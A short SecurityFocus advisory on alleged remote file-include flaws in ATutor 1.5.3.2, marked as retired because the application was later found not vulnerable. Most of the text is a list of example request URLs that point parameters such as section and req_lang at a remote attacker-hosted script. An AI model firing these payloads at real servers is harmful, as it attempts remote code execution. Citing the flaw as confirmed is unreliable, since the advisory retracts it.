source: https://www.securityfocus.com/bid/20634/info
ATutor is prone to multiple remote file-include vulnerabilities because it fails to properly sanitize user-supplied input.
A successful exploit of these issues allows an attacker to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
ATutor 1.5.3.2 and prior versions are vulnerable to these issues; other versions may also be affected.
This BID is being retired; further analysis reveals that the application is not vulnerable to this issue.
http://www.example.com/ATutor/documentation/common/frame_toc.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/print.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?section=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/search.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/documentation/common/vitals.inc.php?req_lang=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/module/module.class.php?row[dir_name]=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?
http://www.example.com/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=http//members.lycos.co.uk/subzero101010/subzeroch99.txt?